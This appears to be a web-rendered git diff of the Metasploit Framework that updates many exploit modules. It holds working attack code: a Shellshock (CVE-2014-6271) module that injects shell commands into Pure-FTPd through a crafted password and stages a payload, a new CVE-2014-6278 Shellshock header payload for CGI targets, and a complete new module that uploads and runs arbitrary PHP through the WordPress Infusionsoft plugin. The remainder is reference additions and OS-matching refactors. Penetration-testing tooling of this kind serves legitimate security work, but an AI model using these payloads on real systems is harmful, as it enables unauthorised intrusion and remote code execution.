|
||||
),
|
||||
'Author' =>
|
||||
[
|
||||
'Stephane Chazelas', # Vulnerability discovery
|
||||
'Frank Denis', # Discovery of Pure-FTPd attack vector
|
||||
'Spencer McIntyre' # Metasploit module
|
||||
],
|
||||
'References' =>
|
||||
[
|
||||
['CVE', '2014-6271'],
|
||||
['OSVDB', '112004'],
|
||||
['EDB', '34765'],
|
||||
['URL', 'https://gist.github.com/jedisct1/88c62ee34e6fa92c31dc']
|
||||
],
|
||||
'Payload' =>
|
||||
{
|
||||
'DisableNops' => true,
|
||||
'Space' => 2048
|
||||
},
|
||||
'Targets' =>
|
||||
[
|
||||
[ 'Linux x86',
|
||||
{
|
||||
'Platform' => 'linux',
|
||||
'Arch' => ARCH_X86,
|
||||
'CmdStagerFlavor' => :printf
|
||||
}
|
||||
],
|
||||
[ 'Linux x86_64',
|
||||
{
|
||||
'Platform' => 'linux',
|
||||
'Arch' => ARCH_X86_64,
|
||||
'CmdStagerFlavor' => :printf
|
||||
}
|
||||
]
|
||||
],
|
||||
'DefaultOptions' =>
|
||||
{
|
||||
'PrependFork' => true
|
||||
},
|
||||
'DefaultTarget' => 0,
|
||||
'DisclosureDate' => 'Sep 24 2014'))
|
||||
register_options(
|
||||
[
|
||||
Opt::RPORT(21),
|
||||
OptString.new('RPATH', [true, 'Target PATH for binaries used by the CmdStager', '/bin'])
|
||||
], self.class)
|
||||
deregister_options('FTPUSER', 'FTPPASS')
|
||||
end
|
||||
|
||||
def check
|
||||
# this check method tries to use the vulnerability to bypass the login
|
||||
username = rand_text_alphanumeric(rand(20) + 1)
|
||||
random_id = (rand(100) + 1)
|
||||
command = "echo auth_ok:1; echo uid:#{random_id}; echo gid:#{random_id}; echo dir:/tmp; echo end"
|
||||
if send_command(username, command) =~ /^2\d\d ok./i
|
||||
return CheckCode::Safe if banner !~ /pure-ftpd/i
|
||||
disconnect
|
||||
|
||||
command = "echo auth_ok:0; echo end"
|
||||
if send_command(username, command) =~ /^5\d\d login authentication failed/i
|
||||
return CheckCode::Vulnerable
|
||||
end
|
||||
end
|
||||
disconnect
|
||||
|
||||
CheckCode::Safe
|
||||
end
|
||||
|
||||
def execute_command(cmd, _opts)
|
||||
cmd.gsub!('chmod', "#{datastore['RPATH']}/chmod")
|
||||
username = rand_text_alphanumeric(rand(20) + 1)
|
||||
send_command(username, cmd)
|
||||
end
|
||||
|
||||
def exploit
|
||||
# Cannot use generic/shell_reverse_tcp inside an elf
|
||||
# Checking before proceeds
|
||||
if generate_payload_exe.blank?
|
||||
fail_with(Failure::BadConfig, "#{peer} - Failed to store payload inside executable, please select a native payload")
|
||||
end
|
||||
|
||||
execute_cmdstager(linemax: 500)
|
||||
handler
|
||||
end
|
||||
|
||||
def send_command(username, cmd)
|
||||
cmd = "() { :;}; #{datastore['RPATH']}/sh -c \"#{cmd}\""
|
||||
connect
|
||||
send_user(username)
|
||||
password_result = send_pass(cmd)
|
||||
disconnect
|
||||
password_result
|
||||
end
|
||||
end
|
|
@ -22,10 +22,12 @@ class Metasploit4 < Msf::Exploit::Remote
|
|||
'Author' => [
|
||||
'Stephane Chazelas', # Vulnerability discovery
|
||||
'wvu', # Original Metasploit aux module
|
||||
'juan vazquez' # Allow wvu's module to get native sessions
|
||||
'juan vazquez', # Allow wvu's module to get native sessions
|
||||
'lcamtuf' # CVE-2014-6278
|
||||
],
|
||||
'References' => [
|
||||
['CVE', '2014-6271'],
|
||||
['CVE', '2014-6278'],
|
||||
['OSVDB', '112004'],
|
||||
['EDB', '34765'],
|
||||
['URL', 'https://access.redhat.com/articles/1200223'],
|
||||
|
@ -64,12 +66,13 @@ class Metasploit4 < Msf::Exploit::Remote
|
|||
OptString.new('HEADER', [true, 'HTTP header to use', 'User-Agent']),
|
||||
OptInt.new('CMD_MAX_LENGTH', [true, 'CMD max line length', 2048]),
|
||||
OptString.new('RPATH', [true, 'Target PATH for binaries used by the CmdStager', '/bin']),
|
||||
OptInt.new('TIMEOUT', [true, 'HTTP read response timeout (seconds)', 5])
|
||||
OptInt.new('TIMEOUT', [true, 'HTTP read response timeout (seconds)', 5]),
|
||||
OptEnum.new('CVE', [true, 'CVE to check/exploit', 'CVE-2014-6271', ['CVE-2014-6271', 'CVE-2014-6278']])
|
||||
], self.class)
|
||||
end
|
||||
|
||||
def check
|
||||
res = req("echo #{marker}")
|
||||
res = req("echo #{marker}", datastore['CVE'])
|
||||
|
||||
if res && res.body.include?(marker * 3)
|
||||
return Exploit::CheckCode::Vulnerable
|
||||
|
@ -105,31 +108,42 @@ class Metasploit4 < Msf::Exploit::Remote
|
|||
# A last chance after the cmdstager
|
||||
# Trying to make it generic
|
||||
unless session_created?
|
||||
req("#{stager_instance.instance_variable_get("@tempdir")}#{stager_instance.instance_variable_get("@var_elf")}")
|
||||
req("#{stager_instance.instance_variable_get("@tempdir")}#{stager_instance.instance_variable_get("@var_elf")}", datastore['CVE'])
|
||||
end
|
||||
end
|
||||
|
||||
def execute_command(cmd, opts)
|
||||
cmd.gsub!('chmod', "#{datastore['RPATH']}/chmod")
|
||||
|
||||
req(cmd)
|
||||
req(cmd, datastore['CVE'])
|
||||
end
|
||||
|
||||
def req(cmd)
|
||||
def req(cmd, cve)
|
||||
case cve
|
||||
when 'CVE-2014-6271'
|
||||
sploit = cve_2014_6271(cmd)
|
||||
when 'CVE-2014-6278'
|
||||
sploit = cve_2014_6278(cmd)
|
||||
end
|
||||
|
||||
send_request_cgi(
|
||||
{
|
||||
'method' => datastore['METHOD'],
|
||||
'uri' => normalize_uri(target_uri.path.to_s),
|
||||
'headers' => {
|
||||
datastore['HEADER'] => sploit(cmd)
|
||||
datastore['HEADER'] => sploit
|
||||
}
|
||||
}, datastore['TIMEOUT'])
|
||||
end
|
||||
|
||||
def sploit(cmd)
|
||||
def cve_2014_6271(cmd)
|
||||
%Q{() { :;};echo -e "\\r\\n#{marker}$(#{cmd})#{marker}"}
|
||||
end
|
||||
|
||||
def cve_2014_6278(cmd)
|
||||
%Q{() { _; } >_[$($())] { echo -e "\\r\\n#{marker}$(#{cmd})#{marker}"; }}
|
||||
end
|
||||
|
||||
def marker
|
||||
@marker ||= rand_text_alphanumeric(rand(42) + 1)
|
||||
end
|
||||
|
|
|
@ -13,7 +13,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
'Name' => 'ManageEngine OpManager / Social IT Arbitrary File Upload',
|
||||
'Name' => 'ManageEngine OpManager and Social IT Arbitrary File Upload',
|
||||
'Description' => %q{
|
||||
This module exploits a file upload vulnerability in ManageEngine OpManager and Social IT.
|
||||
The vulnerability exists in the FileCollector servlet which accepts unauthenticated
|
||||
|
|
|
@ -15,7 +15,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
# :ua_name => HttpClients::FF,
|
||||
# :ua_minver => "3.6.16",
|
||||
# :ua_maxver => "3.6.16",
|
||||
# :os_name => OperatingSystems::MAC_OSX,
|
||||
# :os_name => OperatingSystems::Match::MAC_OSX,
|
||||
# :javascript => true,
|
||||
# :rank => NormalRanking,
|
||||
#})
|
||||
|
|
|
@ -17,7 +17,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
#autopwn_info({
|
||||
# :ua_name => HttpClients::SAFARI,
|
||||
# :ua_maxver => '2.0.2',
|
||||
# :os_name => [ OperatingSystems::MAC_OSX ],
|
||||
# :os_name => OperatingSystems::Match::MAC_OSX,
|
||||
# :javascript => false,
|
||||
# :rank => ExcellentRanking, # reliable cmd execution
|
||||
# :vuln_test => nil,
|
||||
|
|
|
@ -60,7 +60,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
'BrowserRequirements' => {
|
||||
:source => 'script',
|
||||
:ua_name => HttpClients::SAFARI,
|
||||
:os_name => OperatingSystems::MAC_OSX,
|
||||
:os_name => OperatingSystems::Match::MAC_OSX,
|
||||
|
||||
# On 10.6.8 (Safari 5.x), a dialog never appears unless the user
|
||||
# has already manually launched the dropped exe
|
||||
|
|
|
@ -32,7 +32,13 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
['BID', '37314'],
|
||||
['CVE', '2009-4140'],
|
||||
['OSVDB', '59051'],
|
||||
['EDB', '10532']
|
||||
['EDB', '10532'],
|
||||
['WPVDB', '6787'],
|
||||
['WPVDB', '6788'],
|
||||
['WPVDB', '6789'],
|
||||
['WPVDB', '6790'],
|
||||
['WPVDB', '6791'],
|
||||
['WPVDB', '6792']
|
||||
],
|
||||
'Payload' =>
|
||||
{
|
||||
|
|
|
@ -31,7 +31,8 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
[
|
||||
['EDB', '18991'],
|
||||
['OSVDB' '82652'],
|
||||
['BID', '53805']
|
||||
['BID', '53805'],
|
||||
['WPVDB', '6231']
|
||||
],
|
||||
'Privileged' => false,
|
||||
'Platform' => 'php',
|
||||
|
|
|
@ -0,0 +1,82 @@
|
|||
##
|
||||
# This module requires Metasploit: http//metasploit.com/download
|
||||
# Current source: https://github.com/rapid7/metasploit-framework
|
||||
##
|
||||
|
||||
require 'msf/core'
|
||||
|
||||
class Metasploit3 < Msf::Exploit::Remote
|
||||
Rank = ExcellentRanking
|
||||
|
||||
include Msf::HTTP::Wordpress
|
||||
include Msf::Exploit::FileDropper
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
'Name' => 'Wordpress InfusionSoft Upload Vulnerability',
|
||||
'Description' => %q{
|
||||
This module exploits an arbitrary PHP code upload in the WordPress Infusionsoft Gravity
|
||||
Forms plugin, versions from 1.5.3 to 1.5.10. The vulnerability allows for arbitrary file
|
||||
upload and remote code execution.
|
||||
},
|
||||
'Author' =>
|
||||
[
|
||||
'g0blin', # Vulnerability Discovery
|
||||
'us3r777 <us3r777@n0b0.so>' # Metasploit module
|
||||
],
|
||||
'License' => MSF_LICENSE,
|
||||
'References' =>
|
||||
[
|
||||
['CVE', '2014-6446'],
|
||||
['URL', 'http://research.g0blin.co.uk/cve-2014-6446/'],
|
||||
['WPVDB', '7634']
|
||||
],
|
||||
'Privileged' => false,
|
||||
'Platform' => 'php',
|
||||
'Arch' => ARCH_PHP,
|
||||
'Targets' => [['Infusionsoft 1.5.3 - 1.5.10', {}]],
|
||||
'DisclosureDate' => 'Sep 25 2014',
|
||||
'DefaultTarget' => 0)
|
||||
)
|
||||
end
|
||||
|
||||
def check
|
||||
res = send_request_cgi(
|
||||
'uri' => normalize_uri(wordpress_url_plugins, 'infusionsoft', 'Infusionsoft', 'utilities', 'code_generator.php')
|
||||
)
|
||||
|
||||
if res && res.code == 200 && res.body =~ /Code Generator/ && res.body =~ /Infusionsoft/
|
||||
return Exploit::CheckCode::Detected
|
||||
end
|
||||
|
||||
Exploit::CheckCode::Safe
|
||||
end
|
||||
|
||||
def exploit
|
||||
php_pagename = rand_text_alpha(8 + rand(8)) + '.php'
|
||||
res = send_request_cgi({
|
||||
'uri' => normalize_uri(wordpress_url_plugins, 'infusionsoft',
|
||||
'Infusionsoft', 'utilities', 'code_generator.php'),
|
||||
'method' => 'POST',
|
||||
'vars_post' =>
|
||||
{
|
||||
'fileNamePattern' => php_pagename,
|
||||
'fileTemplate' => payload.encoded
|
||||
}
|
||||
})
|
||||
|
||||
if res && res.code == 200 && res.body && res.body.to_s =~ /Creating File/
|
||||
print_good("#{peer} - Our payload is at: #{php_pagename}. Calling payload...")
|
||||
register_files_for_cleanup(php_pagename)
|
||||
else
|
||||
fail_with("#{peer} - Unable to deploy payload, server returned #{res.code}")
|
||||
end
|
||||
|
||||
print_status("#{peer} - Calling payload ...")
|
||||
send_request_cgi({
|
||||
'uri' => normalize_uri(wordpress_url_plugins, 'infusionsoft',
|
||||
'Infusionsoft', 'utilities', php_pagename)
|
||||
}, 2)
|
||||
end
|
||||
|
||||
end
|
|
@ -27,6 +27,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
['CVE', '2005-2612'],
|
||||
['OSVDB', '18672'],
|
||||
['BID', '14533'],
|
||||
['WPVDB', '6034']
|
||||
],
|
||||
'Privileged' => false,
|
||||
'Payload' =>
|
||||
|
@ -34,9 +35,9 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
'DisableNops' => true,
|
||||
'Compat' =>
|
||||
{
|
||||
'ConnectionType' => 'find',
|
||||
'ConnectionType' => 'find'
|
||||
},
|
||||
'Space' => 512,
|
||||
'Space' => 512
|
||||
},
|
||||
'Platform' => 'php',
|
||||
'Arch' => ARCH_PHP,
|
||||
|
|
|
@ -29,7 +29,8 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
'License' => MSF_LICENSE,
|
||||
'References' =>
|
||||
[
|
||||
[ 'URL', "http://www.osirt.com/2013/11/wordpress-optimizepress-hack-file-upload-vulnerability/" ]
|
||||
[ 'URL', "http://www.osirt.com/2013/11/wordpress-optimizepress-hack-file-upload-vulnerability/" ],
|
||||
[ 'WPVDB', '7441' ]
|
||||
],
|
||||
'Privileged' => false,
|
||||
'Platform' => ['php'],
|
||||
|
|
|
@ -38,7 +38,8 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
[ 'OSVDB', '92652' ],
|
||||
[ 'BID', '59316' ],
|
||||
[ 'URL', 'http://wordpress.org/support/topic/pwn3d' ],
|
||||
[ 'URL', 'http://www.acunetix.com/blog/web-security-zone/wp-plugins-remote-code-execution/' ]
|
||||
[ 'URL', 'http://www.acunetix.com/blog/web-security-zone/wp-plugins-remote-code-execution/' ],
|
||||
[ 'WPVDB', '6622' ]
|
||||
],
|
||||
'Privileged' => false,
|
||||
'Platform' => ['php'],
|
||||
|
|
|
@ -23,13 +23,14 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
},
|
||||
'Author' =>
|
||||
[
|
||||
'Charlie Eriksen <charlie[at]ceriksen.com>',
|
||||
'Charlie Eriksen <charlie[at]ceriksen.com>'
|
||||
],
|
||||
'License' => MSF_LICENSE,
|
||||
'References' =>
|
||||
[
|
||||
['OSVDB', '87353'],
|
||||
['URL', 'http://secunia.com/advisories/51037/'],
|
||||
['WPVDB', '6103']
|
||||
],
|
||||
'Privileged' => false,
|
||||
'Payload' =>
|
||||
|
@ -37,8 +38,8 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
'DisableNops' => true,
|
||||
'Compat' =>
|
||||
{
|
||||
'ConnectionType' => 'find',
|
||||
},
|
||||
'ConnectionType' => 'find'
|
||||
}
|
||||
},
|
||||
'Platform' => 'php',
|
||||
'Arch' => ARCH_PHP,
|
||||
|
|
|
@ -31,7 +31,8 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
['OSVDB', '82653'],
|
||||
['BID', '53809'],
|
||||
['EDB', '18993'],
|
||||
['URL', 'http://www.opensyscom.fr/Actualites/wordpress-plugins-asset-manager-shell-upload-vulnerability.html']
|
||||
['URL', 'http://www.opensyscom.fr/Actualites/wordpress-plugins-asset-manager-shell-upload-vulnerability.html'],
|
||||
['WPVDB', '6106']
|
||||
],
|
||||
'Platform' => 'php',
|
||||
'Arch' => ARCH_PHP,
|
||||
|
|
|
@ -34,6 +34,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
['CVE', '2012-4915'],
|
||||
['OSVDB', '88891'],
|
||||
['URL', 'http://secunia.com/advisories/50832'],
|
||||
['WPVDB', '6073']
|
||||
],
|
||||
'Privileged' => false,
|
||||
'Payload' =>
|
||||
|
|
|
@ -31,7 +31,8 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
['OSVDB', '82656'],
|
||||
['BID', '53787'],
|
||||
['EDB', '18987'],
|
||||
['URL', 'http://www.opensyscom.fr/Actualites/wordpress-plugins-wp-property-shell-upload-vulnerability.html']
|
||||
['URL', 'http://www.opensyscom.fr/Actualites/wordpress-plugins-wp-property-shell-upload-vulnerability.html'],
|
||||
['WPVDB', '6225']
|
||||
],
|
||||
'Platform' => 'php',
|
||||
'Arch' => ARCH_PHP,
|
||||
|
|
|
@ -34,7 +34,8 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
'License' => MSF_LICENSE,
|
||||
'References' =>
|
||||
[
|
||||
['URL', 'http://blog.sucuri.net/2014/07/disclosure-insecure-nonce-generation-in-wptouch.html']
|
||||
['URL', 'http://blog.sucuri.net/2014/07/disclosure-insecure-nonce-generation-in-wptouch.html'],
|
||||
['WPVDB', '7118']
|
||||
],
|
||||
'Privileged' => false,
|
||||
'Platform' => ['php'],
|
||||
|
|
|
@ -38,7 +38,8 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
[
|
||||
['URL', 'http://blog.sucuri.net/2014/07/remote-file-upload-vulnerability-on-mailpoet-wysija-newsletters.html'],
|
||||
['URL', 'http://www.mailpoet.com/security-update-part-2/'],
|
||||
['URL', 'https://plugins.trac.wordpress.org/changeset/943427/wysija-newsletters/trunk/helpers/back.php']
|
||||
['URL', 'https://plugins.trac.wordpress.org/changeset/943427/wysija-newsletters/trunk/helpers/back.php'],
|
||||
['WPVDB', '6680']
|
||||
],
|
||||
'Privileged' => false,
|
||||
'Platform' => ['php'],
|
||||
|
|
|
@ -12,7 +12,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
include Msf::Exploit::RopDb
|
||||
include Msf::Exploit::Remote::BrowserAutopwn
|
||||
autopwn_info({
|
||||
:os_name => OperatingSystems::WINDOWS,
|
||||
:os_name => OperatingSystems::Match::WINDOWS,
|
||||
:method => "GetVariable",
|
||||
:classid => "ShockwaveFlash.ShockwaveFlash",
|
||||
:rank => NormalRanking, # reliable memory corruption
|
||||
|
|
|
@ -13,7 +13,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
include Msf::Exploit::Remote::BrowserAutopwn
|
||||
|
||||
autopwn_info({
|
||||
:os_name => OperatingSystems::WINDOWS,
|
||||
:os_name => OperatingSystems::Match::WINDOWS,
|
||||
:ua_name => HttpClients::IE,
|
||||
:ua_minver => "6.0",
|
||||
:ua_maxver => "8.0",
|
||||
|
|
|
@ -49,8 +49,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
'BrowserRequirements' =>
|
||||
{
|
||||
:source => /script|headers/i,
|
||||
:os_name => Msf::OperatingSystems::WINDOWS,
|
||||
:os_flavor => Msf::OperatingSystems::WindowsVersions::XP,
|
||||
:os_name => OperatingSystems::Match::WINDOWS_XP,
|
||||
:ua_name => Msf::HttpClients::IE
|
||||
},
|
||||
'Targets' =>
|
||||
|
|
|
@ -47,7 +47,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
:source => /script|headers/i,
|
||||
:clsid => "{09F68A41-2FBE-11D3-8C9D-0008C7D901B6}",
|
||||
:method => "ChooseFilePath",
|
||||
:os_name => /win/i
|
||||
:os_name => OperatingSystems::Match::WINDOWS,
|
||||
},
|
||||
'Targets' =>
|
||||
[
|
||||
|
@ -55,7 +55,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
[
|
||||
'Windows XP with IE 6',
|
||||
{
|
||||
'os_flavor' => 'XP',
|
||||
'os_name' => OperatingSystems::Match::WINDOWS_XP,
|
||||
'ua_name' => 'MSIE',
|
||||
'ua_ver' => '6.0',
|
||||
'Rop' => false,
|
||||
|
@ -66,7 +66,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
[
|
||||
'Windows XP with IE 7',
|
||||
{
|
||||
'os_flavor' => 'XP',
|
||||
'os_name' => OperatingSystems::Match::WINDOWS_XP,
|
||||
'ua_name' => 'MSIE',
|
||||
'ua_ver' => '7.0',
|
||||
'Rop' => false,
|
||||
|
@ -77,7 +77,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
[
|
||||
'Windows XP with IE 8',
|
||||
{
|
||||
'os_flavor' => 'XP',
|
||||
'os_name' => OperatingSystems::Match::WINDOWS_XP,
|
||||
'ua_name' => 'MSIE',
|
||||
'ua_ver' => '8.0',
|
||||
'Rop' => true,
|
||||
|
@ -88,7 +88,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
[
|
||||
'Windows Vista with IE 7',
|
||||
{
|
||||
'os_flavor' => 'Vista',
|
||||
'os_name' => OperatingSystems::Match::WINDOWS_VISTA,
|
||||
'ua_name' => 'MSIE',
|
||||
'ua_ver' => '7.0',
|
||||
'Rop' => false,
|
||||
|
|
|
@ -13,7 +13,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
|
||||
#include Msf::Exploit::Remote::BrowserAutopwn
|
||||
#autopwn_info({
|
||||
# :os_name => OperatingSystems::WINDOWS,
|
||||
# :os_name => OperatingSystems::Match::WINDOWS,
|
||||
# :ua_name => HttpClients::IE,
|
||||
# :javascript => true,
|
||||
# :rank => NormalRanking, # reliable memory corruption
|
||||
|
|
|
@ -14,7 +14,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
|
||||
#include Msf::Exploit::Remote::BrowserAutopwn
|
||||
#autopwn_info({
|
||||
# :os_name => OperatingSystems::WINDOWS,
|
||||
# :os_name => OperatingSystems::Match::WINDOWS,
|
||||
# :ua_name => HttpClients::SAFARI,
|
||||
# :ua_maxver => '5.0.1',
|
||||
# :ua_maxver => '5.1.7',
|
||||
|
|
|
@ -12,7 +12,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
|
||||
#include Msf::Exploit::Remote::BrowserAutopwn
|
||||
#autopwn_info({
|
||||
# :os_name => OperatingSystems::WINDOWS,
|
||||
# :os_name => OperatingSystems::Match::WINDOWS,
|
||||
# # No particular browser. Works on at least IE6 and Firefox 1.5.0.3
|
||||
# :javascript => true,
|
||||
# :rank => NormalRanking, # reliable memory corruption
|
||||
|
|
|
@ -13,7 +13,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
|
||||
#include Msf::Exploit::Remote::BrowserAutopwn
|
||||
#autopwn_info({
|
||||
# :os_name => OperatingSystems::WINDOWS,
|
||||
# :os_name => OperatingSystems::Match::WINDOWS,
|
||||
# :javascript => true,
|
||||
# :rank => NormalRanking, # reliable memory corruption
|
||||
# :vuln_test => nil,
|
||||
|
|
|
@ -12,7 +12,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
|
||||
#include Msf::Exploit::Remote::BrowserAutopwn
|
||||
#autopwn_info({
|
||||
# :os_name => OperatingSystems::WINDOWS,
|
||||
# :os_name => OperatingSystems::Match::WINDOWS,
|
||||
# :javascript => true,
|
||||
# :rank => NormalRanking
|
||||
#})
|
||||
|
|
|
@ -14,7 +14,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
|
||||
#include Msf::Exploit::Remote::BrowserAutopwn
|
||||
#autopwn_info({
|
||||
# :os_name => OperatingSystems::WINDOWS,
|
||||
# :os_name => OperatingSystems::Match::WINDOWS,
|
||||
# :ua_name => HttpClients::IE,
|
||||
# :javascript => true,
|
||||
# :rank => NormalRanking,
|
||||
|
|
|
@ -17,7 +17,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
# :ua_minver => "6.0",
|
||||
# :ua_maxver => "8.0",
|
||||
# :javascript => true,
|
||||
# :os_name => OperatingSystems::WINDOWS,
|
||||
# :os_name => OperatingSystems::Match::WINDOWS,
|
||||
# :classid => "{9E065E4A-BD9D-4547-8F90-985DC62A5591}",
|
||||
# :method => "SetSource",
|
||||
# :rank => NormalRanking
|
||||
|
|
|
@ -17,7 +17,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
# :ua_minver => "6.0",
|
||||
# :ua_maxver => "9.0",
|
||||
# :javascript => true,
|
||||
# :os_name => OperatingSystems::WINDOWS,
|
||||
# :os_name => OperatingSystems::Match::WINDOWS,
|
||||
# :classid => "{9E065E4A-BD9D-4547-8F90-985DC62A5591}",
|
||||
# :method => "SetSource",
|
||||
# :rank => NormalRanking
|
||||
|
|
|
@ -15,7 +15,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
# :ua_minver => "6.0",
|
||||
# :ua_maxver => "7.0",
|
||||
# :javascript => true,
|
||||
# :os_name => OperatingSystems::WINDOWS,
|
||||
# :os_name => OperatingSystems::Match::WINDOWS,
|
||||
# :classid => "{94773112-72E8-11D0-A42E-00A024DED613}",
|
||||
# :method => "RegisterSchemaRepoFromFileByDbSet",
|
||||
# :rank => NormalRanking
|
||||
|
|
|
@ -17,7 +17,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
# :ua_minver => "6.0",
|
||||
# :ua_maxver => "8.0",
|
||||
# :javascript => true,
|
||||
# :os_name => OperatingSystems::WINDOWS,
|
||||
# :os_name => OperatingSystems::Match::WINDOWS,
|
||||
# :rank => NormalRanking,
|
||||
# :classid => "{88DD90B6-C770-4CFF-B7A4-3AFD16BB8824}",
|
||||
# :method => "ServerResourceVersion"
|
||||
|
|
|
@ -15,7 +15,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
# :ua_minver => "7.0",
|
||||
# :ua_maxver => "9.0",
|
||||
# :javascript => true,
|
||||
# :os_name => OperatingSystems::WINDOWS,
|
||||
# :os_name => OperatingSystems::Match::WINDOWS,
|
||||
# :classid => "{C3B92104-B5A7-11D0-A37F-00A0248F0AF1}",
|
||||
# :method => "SetShapeNodeType",
|
||||
# :rank => NormalRanking
|
||||
|
|
|
@ -17,7 +17,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
# :ua_minver => "6.0",
|
||||
# :ua_maxver => "9.0",
|
||||
# :javascript => true,
|
||||
# :os_name => OperatingSystems::WINDOWS,
|
||||
# :os_name => OperatingSystems::Match::WINDOWS,
|
||||
# :rank => Rank,
|
||||
# :classid => "{8D9E2CC7-D94B-4977-8510-FB49C361A139}",
|
||||
# :method => "WriteFileBinary"
|
||||
|
|
|
@ -17,8 +17,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
# :ua_minver => "6.0",
|
||||
# :ua_maxver => "8.0",
|
||||
# :javascript => true,
|
||||
# :os_name => OperatingSystems::WINDOWS,
|
||||
# :os_ver => OperatingSystems::WindowsVersions::XP,
|
||||
# :os_name => OperatingSystems::Match::WINDOWS_XP,
|
||||
# :rank => NormalRanking,
|
||||
# :classid => "{8D9E2CC7-D94B-4977-8510-FB49C361A139}",
|
||||
# :method => "WriteFileString "
|
||||
|
|
|
@ -17,7 +17,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
# :ua_minver => "6.0",
|
||||
# :ua_maxver => "8.0",
|
||||
# :javascript => true,
|
||||
# :os_name => OperatingSystems::WINDOWS,
|
||||
# :os_name => OperatingSystems::Match::WINDOWS,
|
||||
# :rank => NormalRanking,
|
||||
# :classid => "{24E04EBF-014D-471F-930E-7654B1193BA9}",
|
||||
# :method => "TabCaption"
|
||||
|
|
|
@ -12,7 +12,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
#include Msf::Exploit::Remote::BrowserAutopwn
|
||||
#
|
||||
#autopwn_info({
|
||||
# :os_name => OperatingSystems::WINDOWS,
|
||||
# :os_name => OperatingSystems::Match::WINDOWS,
|
||||
# :ua_name => HttpClients::IE,
|
||||
# :ua_minver => "6.0",
|
||||
# :ua_maxver => "8.0",
|
||||
|
|
|
@ -16,7 +16,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
# :ua_minver => "8.0",
|
||||
# :ua_maxver => "8.0",
|
||||
# :javascript => true,
|
||||
# :os_name => OperatingSystems::WINDOWS,
|
||||
# :os_name => OperatingSystems::Match::WINDOWS,
|
||||
# :rank => GoodRanking
|
||||
#})
|
||||
|
||||
|
|
|
@ -16,7 +16,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
:ua_minver => "8.0",
|
||||
:ua_maxver => "8.0",
|
||||
:javascript => true,
|
||||
:os_name => OperatingSystems::WINDOWS,
|
||||
:os_name => OperatingSystems::Match::WINDOWS,
|
||||
:rank => GoodRanking
|
||||
})
|
||||
|
||||
|
|
|
@ -23,7 +23,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
# than the max by setting to 6.1 (which doesn't really exist).
|
||||
:ua_maxver => "6.1",
|
||||
:javascript => true,
|
||||
:os_name => OperatingSystems::WINDOWS,
|
||||
:os_name => OperatingSystems::Match::WINDOWS,
|
||||
:method => [ 'CreateObject', 'GetObject' ],
|
||||
:classid =>
|
||||
[
|
||||
|
|
Some files were not shown because too many files have changed in this diff Show More
Loading…
Reference in New Issue